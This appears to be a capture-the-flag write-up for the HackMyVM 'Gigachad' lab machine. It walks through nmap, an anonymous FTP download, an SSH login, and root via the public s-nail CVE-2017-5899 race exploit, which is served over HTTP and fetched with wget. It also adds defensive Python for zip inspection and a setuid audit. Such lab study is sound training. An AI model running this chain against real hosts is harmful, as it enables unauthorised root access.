
HackMyVM Gigachad

Information gathering

┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.214.85
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-16 07:42 EDT
Nmap scan report for 192.168.214.85
Host is up (0.00011s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:73:76:3D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.22 seconds

┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.214.85 -p 21 -sC
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-16 07:43 EDT
Nmap scan report for bogon (192.168.214.85)
Host is up (0.00024s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x    1 1000     1000          297 Feb 07  2021 chadinfo
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.214.76
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
MAC Address: 08:00:27:73:76:3D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.77 seconds

Target IP: 192.168.214.85

FTP allows anonymous login

┌──(root㉿kali)-[/home/kali]
└─# lftp 192.168.214.85 -u anonymous
Password:
lftp anonymous@192.168.214.85:~> ls -al
dr-xr-xr-x    2 1000     1000         4096 Feb 07  2021 .
dr-xr-xr-x    2 1000     1000         4096 Feb 07  2021 ..
-r-xr-xr-x    1 1000     1000          297 Feb 07  2021 chadinfo
lftp anonymous@192.168.214.85:/> get chadinfo
297 bytes transferred
lftp anonymous@192.168.214.85:/> exit

Running file on it shows it is a zip archive

┌──(root㉿kali)-[/home/kali]
└─# file chadinfo
chadinfo: Zip archive data, at least v1.0 to extract, compression method=store

Read it directly with cat

┌──(root㉿kali)-[/home/kali]
└─# cat chadinfo
PK
0HR��␦ƃchadinfoUT       �j `Zj `uxwhy yes,
#######################
username is chad
???????????????????????
password?
!!!!!!!!!!!!!!!!!!!!!!!
go to /drippinchad.png
PK
0HR��␦ƃ��chadinfoUT�j `uxPKN� 

This gives a username, chad, and a PNG path; next, open that path on the web server.
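Why cat shows the note in clear: file reported compression method=store, and a stored zip entry keeps its payload verbatim between the zip headers, so no unzip is needed. The example below is added here and is not from the writeup: it rebuilds a note like chadinfo with store and with deflate, and walks the local file headers by hand; the note text and file name are constructed.

```python
import io
import struct
import zipfile

# Constructed sample modelled on the chadinfo note from the writeup.
NOTE = (b"why yes,\n#######################\nusername is chad\n"
        b"???????????????????????\npassword?\n!!!!!!!!!!!!!!!!!!!!!!!\n"
        b"go to /drippinchad.png\n")

def build_zip(name, data, method):
    """Raw bytes of a one-entry zip written with the given method (0=store, 8=deflate)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=method) as zf:
        zf.writestr(name, data)
    return buf.getvalue()

def plaintext_visible(raw, needle):
    """True if `needle` occurs verbatim in the archive bytes, i.e. cat or
    strings would show it without unzipping."""
    return needle in raw

def stored_entries(raw):
    """Walk the local file headers (signature PK 03 04) and return {name: payload}
    for every entry whose method is 0 (store). Assumes the sizes are present in
    the local header (no bit-3 data descriptor), which holds for archives written
    to a seekable file, as zipfile does here."""
    out, pos = {}, 0
    while (pos := raw.find(b"PK\x03\x04", pos)) >= 0:
        # header: sig(4) ver(2) flags(2) method(2) time(2) date(2) crc(4)
        #         csize(4) usize(4) namelen(2) extralen(2) name extra data
        method, csize, namelen, extralen = struct.unpack_from("<H8xI4xHH", raw, pos + 8)
        name = raw[pos + 30:pos + 30 + namelen].decode("utf-8", "replace")
        data_start = pos + 30 + namelen + extralen
        if method == 0:
            out[name] = raw[data_start:data_start + csize]
        pos = data_start + csize
    return out

if __name__ == "__main__":
    stored = build_zip("chadinfo", NOTE, zipfile.ZIP_STORED)
    deflated = build_zip("chadinfo", NOTE, zipfile.ZIP_DEFLATED)
    print("store   leaks note:", plaintext_visible(stored, b"username is chad"))
    print("deflate leaks note:", plaintext_visible(deflated, b"username is chad"))
    print(stored_entries(stored)["chadinfo"].decode(), end="")
```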

I saved the image locally. At first I assumed it was image steganography, but that led nowhere; a Google reverse image search showed it is a geolocation puzzle, and the tower is the Maiden's Tower.

Looking it up on Wikipedia gave the English name, maidenstower.

Since the initial scan of the target showed an SSH service, the next step is to connect over SSH.

SSH into the target

userflag
chad@gigachad:~$ ls -al
total 20
drwxr-xr-x 4 chad chad 4096 Apr 16 06:58 .
drwxr-xr-x 3 root root 4096 Feb  7  2021 ..
dr-xr-xr-x 2 chad chad 4096 Feb  7  2021 ftp
drwx------ 3 chad chad 4096 Apr 16 06:58 .gnupg
-r-x------ 1 chad chad   32 Feb  7  2021 user.txt
chad@gigachad:~$ cat user.txt
0FAD8F4B099A26E004376EAB42B6A56Achad@gigachad:~$

Privilege escalation

chad@gigachad:~$ find / -user root -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/s-nail/s-nail-privsep
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh

The listing includes s-nail (CVE-2017-5899); searching for an exploit turned up the following.
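From the defender's side, the odd one out in that listing is exactly what a setuid integrity check should flag. The script below is an added example, not from the writeup: it reproduces the find command's filter in Python and diffs a listing against a baseline; the sample listing and the baseline are constructed from the writeup's own output.

```python
import os
import stat

# Constructed input: the listing `find / -user root -perm -4000` printed
# on the target in the writeup.
FIND_OUTPUT = """\
/usr/lib/openssh/ssh-keysign
/usr/lib/s-nail/s-nail-privsep
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh
"""

# Baseline of setuid-root files expected on this image: constructed here as the
# same listing minus the mail helper. Generate the real one from a clean install.
BASELINE = set(FIND_OUTPUT.split()) - {"/usr/lib/s-nail/s-nail-privsep"}

SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}

def find_suid_root(root="/"):
    """Python equivalent of `find / -user root -perm -4000`: regular files
    owned by uid 0 with the setuid bit set; symlinks and pseudo-fs skipped."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if (stat.S_ISREG(st.st_mode) and st.st_uid == 0
                    and st.st_mode & stat.S_ISUID):
                yield path

def unexpected_suid(paths, baseline=BASELINE):
    """Setuid-root paths the baseline does not cover, sorted; these are the
    candidates to review or strip the bit from."""
    return sorted(set(paths) - set(baseline))

if __name__ == "__main__":
    print(unexpected_suid(FIND_OUTPUT.split()))
```

Run find_suid_root() instead of the canned listing to audit a live host.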

Next, save the script on Kali and start an HTTP server there.

┌──(root㉿kali)-[/home/kali/bash]
└─# searchsploit -m 47172
  Exploit: S-nail < 14.8.16 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/47172
     Path: /usr/share/exploitdb/exploits/multiple/local/47172.sh
    Codes: CVE-2017-5899
 Verified: False
File Type: POSIX shell script, ASCII text executable
cp: overwrite '/home/kali/bash/47172.sh'? y
Copied to: /home/kali/bash/47172.sh

┌──(root㉿kali)-[/home/kali/bash]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.214.85 - - [16/Apr/2025 08:03:47] "GET /47172.sh HTTP/1.1" 200 -

On the target, fetch 47172.sh from Kali with wget.

chad@gigachad:~$ wget 192.168.214.76/47172.sh
--2025-04-16 07:09:33--  http://192.168.214.76/47172.sh
Connecting to 192.168.214.76:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8479 (8.3K) [text/x-sh]
Saving to: ‘47172.sh.1’

47172.sh.1                100%[===================================>]   8.28K  --.-KB/s    in 0s

2025-04-16 07:09:33 (232 MB/s) - ‘47172.sh.1’ saved [8479/8479]

Because the script exploits a race condition, there is an element of luck: with luck it succeeds after a few runs, without it, many more.

rootflag
  It cannot be run by itself.
[.] Race #863 of 1000 ...
[+] got root! /var/tmp/.sh (uid=0 gid=0)
[.] Cleaning up...
[+] Success:
-rwsr-xr-x 1 root root 14424 Apr 16 07:12 /var/tmp/.sh
[.] Launching root shell: /var/tmp/.sh
# bash
root@gigachad:~# cd /root
root@gigachad:/root# ls
chad_real_identity.png  root.txt
root@gigachad:/root# cat root.txt
832B123648707C6CD022DD9009AEF2FDroot@gigachad:/root#
